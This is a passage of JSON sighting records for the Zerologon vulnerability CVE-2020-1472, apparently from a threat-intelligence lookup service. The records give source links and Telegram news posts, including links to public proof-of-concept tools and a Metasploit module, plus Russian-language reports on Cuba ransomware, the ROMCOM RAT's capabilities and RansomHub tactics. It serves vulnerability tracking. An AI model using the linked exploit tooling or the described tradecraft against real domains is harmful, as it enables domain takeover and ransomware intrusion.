"creation_timestamp": "2026-02-02T12:28:56.163404Z"}, {"uuid": "01aa9133-798a-42f2-ac32-940491a6560e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/86cbdda0-193d-4704-a9ae-84f65cac147e", "content": "", "creation_timestamp": "2026-02-02T12:25:27.989822Z"}, {"uuid": "ed67ba6e-77e6-424e-9b3e-19e04bc7e025", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "Telegram/4QOnyeYC_lTC0SMJQhtMgvSiM85xnm7m1QqUSxY6BArIyUs", "content": "", "creation_timestamp": "2025-12-23T21:00:05.000000Z"}, {"uuid": "4b3fe1c0-f872-418e-8a18-026091cf454d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/uvU3gBnf9Z1WMovVGRRTdFZDjWMl1qRCMdPMKGqSGuqnW3I", "content": "", "creation_timestamp": "2025-12-06T15:00:08.000000Z"}, {"uuid": "66da4cc2-e771-472c-ab36-c66eee518712", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/cKure/2222", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 Windows Zerologon PoC exploits allow domain takeover. 
Patch Now!\n\nCVE-2020-1472\n\nhttps://www.bleepingcomputer.com/news/microsoft/windows-zerologon-poc-exploits-allow-domain-takeover-patch-now/", "creation_timestamp": "2020-09-19T11:38:39.000000Z"}, {"uuid": "db9c3694-5299-44dc-9528-d08a5336c8cf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/GFK7iRP-YRfUisfPB-meWn-WL3QJHLEcpUZ2wQtZdLdd_6s", "content": "", "creation_timestamp": "2025-12-07T21:00:05.000000Z"}, {"uuid": "a208d7a4-b128-41d1-b32b-c442baf47faa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/cKure/2408", "content": "\u25a0\u25a0\u25a0\u25a1\u25a1 CVE-2020-1472\n\nhttps://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/admin/dcerpc/cve_2020_1472_zerologon.rb", "creation_timestamp": "2020-09-29T09:26:18.000000Z"}, {"uuid": "1eba8c7e-2e06-4b42-ac44-e826f99e8a30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/cKure/2217", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Zerologon : Instantly become domain admin by subverting Netlogon cryptography.\n\nhttps://github.com/SecuraBV/CVE-2020-1472\n\nTest tool for CVE-2020-1472.", "creation_timestamp": "2020-09-15T14:46:33.000000Z"}, {"uuid": "e64f0462-2930-4709-8fd4-bd6914253ae2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://gist.github.com/polirise-och5ty-long/0553d1b567d5e4e4c05bd4bd470b77bf", "content": "", "creation_timestamp": "2026-04-19T17:35:28.000000Z"}, {"uuid": 
"a2282986-146f-4db5-aeed-ec354763197c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://gist.github.com/polirise-och5ty-long/921c7aa9360839078ec5ad52cee75648", "content": "", "creation_timestamp": "2026-04-19T17:37:51.000000Z"}, {"uuid": "f1a8b90f-ca7c-407f-bf4c-047fd700d9f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://gist.github.com/polirise-och5ty-long/26f16159ab0369f7b5368e757a208f61", "content": "", "creation_timestamp": "2026-04-19T17:39:00.000000Z"}, {"uuid": "34518a0d-6a7d-4a67-9741-d3d4e8eda2ed", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "https://t.me/CyberGovIL/877", "content": "", "creation_timestamp": "2020-10-06T11:44:09.000000Z"}, {"uuid": "d39b7353-ac9e-4389-8720-eaf3f246a5b9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/8wPJR4Zrqe1NVpmz6R4R-oJOE4FmewBY2nxE00bK5aCo0SE", "content": "", "creation_timestamp": "2025-10-18T19:00:11.000000Z"}, {"uuid": "e432cd95-5306-47ee-b9e7-816a4ca9d800", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "published-proof-of-concept", "source": "Telegram/ZHsH8l_PJf6qA-LG3pwKoQfrYnUBM4bmr6171DkIh35gCrQ", "content": "", "creation_timestamp": "2025-10-18T21:00:05.000000Z"}, {"uuid": "7c42892b-690a-4692-b8b9-98e466494240", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 
"9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "exploited", "source": "https://t.me/itsec_news/1174", "content": "\u200b\ud83d\udde1 A tropical scorpion from Cuba attacks with unknown tools.\n\n\ud83d\udcac According to a report by researchers at Palo Alto Networks Unit 42, the threat actor they named Tropical Scorpius is presumably a member of the Cuba ransomware group and uses previously unknown techniques, tactics and procedures, including a new remote access trojan and a new privilege escalation 
tool.\n\nThe Cuba ransomware was launched in 2019. In the first quarter of 2022 it was updated and received, among other things, an updated encryptor with more fine-grained parameters. The cybercriminal Tropical Scorpius uses the standard Cuba ransomware payload, which has remained practically unchanged since the campaign launched in 2019.\n\nOne of the new methods since June 2022 is the use of 
a legitimate but invalid NVIDIA certificate to sign a kernel driver that is removed in the early stages of infection. The certificates were stolen by the LAPSUS group in March 2022. The driver's task is to detect security system processes and terminate them so that the hacker can avoid detection in the compromised environment.\n\nThen Tropical Scorpius used a local privilege escalation tool that 
\u0441\u043e\u0434\u0435\u0440\u0436\u0438\u0442 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u0434\u043b\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0432 Windows CVE-2022-24521.\n\n\u041d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u043c \u044d\u0442\u0430\u043f\u0435 Tropical Scorpius \u0437\u0430\u0433\u0440\u0443\u0437\u0438\u043b ADFind \u0438 NetScan \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0431\u043e\u043a\u043e\u0432\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u044f. \u0422\u0430\u043a\u0436\u0435 \u0441\u0443\u0431\u044a\u0435\u043a\u0442 \u0443\u0433\u0440\u043e\u0437\u044b \u0440\u0430\u0437\u0432\u0435\u0440\u043d\u0443\u043b \u043d\u043e\u0432\u044b\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043a\u044d\u0448\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0443\u0447\u0435\u0442\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 Kerberos.\n\n\u0422\u0430\u043a\u0436\u0435 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a \u043c\u043e\u0436\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u0438\u0439 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442 ZeroLogon, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u043e\u0448\u0438\u0431\u043a\u0443 CVE-2020-1472 \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 
\u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430 \u0434\u043e\u043c\u0435\u043d\u0430.\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438, \u0447\u0442\u043e Tropical Scorpius \u0440\u0430\u0437\u0432\u0435\u0440\u0442\u044b\u0432\u0430\u0435\u0442 ROMCOM RAT, \u0440\u0430\u043d\u0435\u0435 \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u0435\u0442 \u0441\u0432\u044f\u0437\u044c \u0441 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u043e\u043c \u0447\u0435\u0440\u0435\u0437 ICMP-\u0437\u0430\u043f\u0440\u043e\u0441\u044b, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0435 \u0444\u0443\u043d\u043a\u0446\u0438\u044f\u043c\u0438 Windows API.\n\nROMCOM RAT \u043f\u043e\u0434\u0434\u0435\u0440\u0436\u0438\u0432\u0430\u0435\u0442 10 \u043a\u043e\u043c\u0430\u043d\u0434:\n\n\u2014 \u0412\u0435\u0440\u043d\u0443\u0442\u044c \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u043e \u043f\u043e\u0434\u043a\u043b\u044e\u0447\u0435\u043d\u043d\u043e\u043c \u0434\u0438\u0441\u043a\u0435;\n\u2014 \u0412\u0435\u0440\u043d\u0443\u0442\u044c \u0441\u043f\u0438\u0441\u043a\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u0434\u043b\u044f \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u043e\u0433\u043e \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430;\n\u2014 \u0417\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u043e\u0431\u0440\u0430\u0442\u043d\u0443\u044e \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0443 \u043f\u043e\u0434 \u0438\u043c\u0435\u043d\u0435\u043c \u00absvchelper.exe\u00bb \u0432 \u043f\u0430\u043f\u043a\u0435 \u00ab%ProgramData%\u00bb;\n\u2014 \u0417\u0430\u0433\u0440\u0443\u0437\u0438\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 
C2-\u0441\u0435\u0440\u0432\u0435\u0440 \u0432 \u0432\u0438\u0434\u0435 ZIP-\u0444\u0430\u0439\u043b\u0430, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f IShellDispatch \u0434\u043b\u044f \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0444\u0430\u0439\u043b\u043e\u0432;\n\u2014 \u0421\u043a\u0430\u0447\u0430\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435 \u0438 \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0432 \u00abworker.txt\u00bb \u0432 \u043f\u0430\u043f\u043a\u0435 \u00ab%ProgramData%\u00bb;\n\u2014 \u0423\u0434\u0430\u043b\u0438\u0442\u044c \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 \u0444\u0430\u0439\u043b;\n\u2014 \u0423\u0434\u0430\u043b\u0438\u0442\u044c \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 \u043a\u0430\u0442\u0430\u043b\u043e\u0433;\n\u2014 \u0421\u043e\u0437\u0434\u0430\u0442\u044c \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0441 \u043f\u043e\u0434\u043c\u0435\u043d\u043e\u0439 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430;\n\u2014 \u041e\u0431\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u0442\u043e\u043b\u044c\u043a\u043e ServiceMain, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u043c \u043e\u0442 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0438 \u043f\u0440\u0438\u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 120 000 \u043c\u0441;\n\u2014 \u0418\u0442\u0435\u0440\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b \u0438 \u0441\u043e\u0431\u0440\u0430\u0442\u044c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432.\n\n\u041f\u043e\u044f\u0432\u043b\u0435\u043d\u0438\u0435 Tropical Scorpius 
\u0438 \u0435\u0433\u043e \u043d\u043e\u0432\u044b\u0445 TTP \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u0442 \u043d\u0430 \u0442\u043e, \u0447\u0442\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c Cuba \u043f\u0440\u0435\u0432\u0440\u0430\u0449\u0430\u0435\u0442\u0441\u044f \u0432 \u0431\u043e\u043b\u0435\u0435 \u043e\u043f\u0430\u0441\u043d\u0443\u044e \u0443\u0433\u0440\u043e\u0437\u0443. \u0422\u043e\u0447\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0436\u0435\u0440\u0442\u0432 \u043d\u0430 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u043d\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u043d\u043e Cuba \u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b 4 \u0436\u0435\u0440\u0442\u0432 \u0441 \u0438\u044e\u043d\u044f 2022 \u0433\u043e\u0434\u0430 \u043d\u0430 \u0441\u0432\u043e\u0435\u043c onion-\u0441\u0430\u0439\u0442\u0435. 
\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u0432\u0440\u0435\u043c\u044f \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0433\u043e\u0432\u043e\u0440\u043e\u0432, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0436\u0438\u0434\u0430\u044e\u0442 \u0443\u0432\u0438\u0434\u0435\u0442\u044c \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u044b \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0432\u043e \u0432\u0442\u043e\u0440\u043e\u0439 \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0435 2022 \u0433\u043e\u0434\u0430.\n\n#\u0425\u0430\u043a\u0435\u0440\u044b #\u041a\u0443\u0431\u0430 \n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2022-08-11T15:00:29.000000Z"}, {"uuid": "8c06e567-a7c4-4987-92ed-3759339c05ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-1472", "type": "seen", "source": "https://t.me/itsec_news/5413", "content": "\u200b\u26a1\ufe0f600 \u0436\u0435\u0440\u0442\u0432 \u0437\u0430 \u0433\u043e\u0434: RansomHub \u2013 \u043d\u043e\u0432\u044b\u0439 \u043b\u0438\u0434\u0435\u0440 \u0432 \u0441\u0444\u0435\u0440\u0435 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0438\u0445 \u0430\u0442\u0430\u043a\n\n\ud83d\udcac \u0412 2024 \u0433\u043e\u0434\u0443 \u043d\u0430 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u043e\u0439 \u0441\u0446\u0435\u043d\u0435 \u0441\u0442\u0440\u0435\u043c\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043f\u043e\u044f\u0432\u0438\u043b\u0441\u044f \u043d\u043e\u0432\u044b\u0439 \u0438\u0433\u0440\u043e\u043a \u2014 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 RansomHub, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0443\u0441\u043f\u0435\u043b\u0430 \u0430\u0442\u0430\u043a\u043e\u0432\u0430\u0442\u044c \u0443\u0436\u0435 \u0431\u043e\u043b\u0435\u0435 600 
\u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439 \u043f\u043e \u0432\u0441\u0435\u043c\u0443 \u043c\u0438\u0440\u0443. \u041f\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f Group-IB, \u0433\u0440\u0443\u043f\u043f\u0430 RansomHub \u0437\u0430\u043f\u043e\u043b\u043d\u0438\u043b\u0430 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c\u0441\u043a\u0443\u044e \u043d\u0438\u0448\u0443 \u043f\u043e\u0441\u043b\u0435 \u043d\u0435\u0434\u0430\u0432\u043d\u0438\u0445 \u043d\u0430\u0440\u0443\u0448\u0435\u043d\u0438\u0439 \u0432 \u0434\u0435\u044f\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 ALPHV \u0438 LockBit .\n\n\u042d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e RansomHub \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0432 \u0444\u043e\u0440\u043c\u0430\u0442\u0435 ransomware-as-a-service (RaaS), \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043f\u0440\u0438\u0432\u043b\u0435\u043a\u0430\u044f \u043f\u0430\u0440\u0442\u043d\u0451\u0440\u043e\u0432 \u043d\u0430 \u043f\u043e\u0434\u043f\u043e\u043b\u044c\u043d\u044b\u0445 \u0444\u043e\u0440\u0443\u043c\u0430\u0445, \u0442\u0430\u043a\u0438\u0445 \u043a\u0430\u043a RAMP. 
\u041e\u0441\u043d\u043e\u0432\u043d\u043e\u0439 \u0441\u0442\u0440\u0430\u0442\u0435\u0433\u0438\u0435\u0439 \u0441\u0442\u0430\u043b\u043e \u043f\u0435\u0440\u0435\u043c\u0430\u043d\u0438\u0432\u0430\u043d\u0438\u0435 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 , \u0440\u0430\u043d\u0435\u0435 \u0440\u0430\u0431\u043e\u0442\u0430\u0432\u0448\u0438\u0445 \u043d\u0430 \u0434\u0440\u0443\u0433\u0438\u0435 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u0447\u0442\u043e \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u043b\u043e RansomHub \u0431\u044b\u0441\u0442\u0440\u043e \u043d\u0430\u0440\u0430\u0441\u0442\u0438\u0442\u044c \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u044b \u0430\u0442\u0430\u043a.\n\n\u0410\u043d\u0430\u043b\u0438\u0437 \u043a\u043e\u0434\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u0430 \u043f\u043e\u043a\u0430\u0437\u0430\u043b, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u043f\u0440\u0438\u043e\u0431\u0440\u0435\u043b\u0430 \u0441\u0432\u043e\u0451 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435 \u0443 Knight (Cyclops), \u0434\u0440\u0443\u0433\u043e\u0439 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u043a\u0438\u0431\u0435\u0440\u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u043e\u0439 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438. 
\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0433\u043e\u0442\u043e\u0432\u044b\u0445 \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0443\u0441\u043a\u043e\u0440\u0438\u043b\u043e \u0440\u0430\u0437\u0432\u0451\u0440\u0442\u044b\u0432\u0430\u043d\u0438\u0435 \u0430\u0442\u0430\u043a, \u0430 \u043c\u0443\u043b\u044c\u0442\u0438\u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u0442\u044c \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u043d\u0430 Windows, ESXi, Linux \u0438 FreeBSD, \u0440\u0430\u0441\u0448\u0438\u0440\u044f\u044f \u0441\u043f\u0438\u0441\u043e\u043a \u043f\u043e\u0442\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0445 \u0436\u0435\u0440\u0442\u0432.\n\nRansomHub \u043e\u0442\u043b\u0438\u0447\u0430\u0435\u0442\u0441\u044f \u0432\u044b\u0441\u043e\u043a\u043e\u0439 \u0441\u0442\u0435\u043f\u0435\u043d\u044c\u044e \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u043e\u0441\u0442\u0438. 
\u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043a\u0430\u043a \u043f\u0440\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0435 \u0442\u0435\u0445\u043d\u0438\u043a\u0438 \u0432\u0437\u043b\u043e\u043c\u0430 \u2014 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 VPN-\u0441\u0435\u0440\u0432\u0438\u0441\u044b \u0438 \u043f\u043e\u0434\u0431\u043e\u0440 \u043f\u0430\u0440\u043e\u043b\u0435\u0439, \u0442\u0430\u043a \u0438 \u0441\u043b\u043e\u0436\u043d\u044b\u0435 \u043c\u0435\u0442\u043e\u0434\u044b, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f. \u0412 \u0430\u0440\u0441\u0435\u043d\u0430\u043b\u0435 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0445 \u2014 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u044b \u0432\u0440\u043e\u0434\u0435 PCHunter, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0438\u0435 \u043e\u0431\u0445\u043e\u0434\u0438\u0442\u044c \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430 \u0437\u0430\u0449\u0438\u0442\u044b.\n\n\u0422\u0430\u043a\u0442\u0438\u043a\u0430 \u0430\u0442\u0430\u043a \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0435\u0442\u0438 \u0436\u0435\u0440\u0442\u0432\u044b \u0438 \u0437\u0430\u0445\u0432\u0430\u0442 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0446\u0435\u043d\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445. 
\u041e\u043f\u0435\u0440\u0430\u0442\u043e\u0440\u044b \u043f\u0440\u043e\u043d\u0438\u043a\u0430\u044e\u0442 \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443, \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0442 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u043c\u0438 \u0443\u0437\u043b\u0430\u043c\u0438 \u2014 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u043c\u0438 \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0430\u043c\u0438, \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u044b\u043c\u0438 \u043a\u043e\u043f\u0438\u044f\u043c\u0438, \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438 \u2014 \u0438 \u043f\u0435\u0440\u0435\u043d\u043e\u0441\u044f\u0442 \u043a\u043e\u043d\u0444\u0438\u0434\u0435\u043d\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u043d\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u044b. 
\u0414\u043b\u044f \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043f\u0440\u0435\u0441\u0442\u0443\u043f\u043d\u0438\u043a\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 Filezilla, \u0430 \u0437\u0430\u0442\u0435\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0448\u0438\u0444\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043d\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\n\u041f\u043e\u0441\u043b\u0435 \u0437\u0430\u0432\u0435\u0440\u0448\u0435\u043d\u0438\u044f \u0430\u0442\u0430\u043a\u0438 RansomHub \u0448\u0430\u043d\u0442\u0430\u0436\u0438\u0440\u0443\u0435\u0442 \u0436\u0435\u0440\u0442\u0432\u0443, \u0442\u0440\u0435\u0431\u0443\u044f \u0432\u044b\u043a\u0443\u043f \u0437\u0430 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0443 \u0438 \u043d\u0435\u043f\u0443\u0431\u043b\u0438\u043a\u0430\u0446\u0438\u044e \u0434\u0430\u043d\u043d\u044b\u0445. 
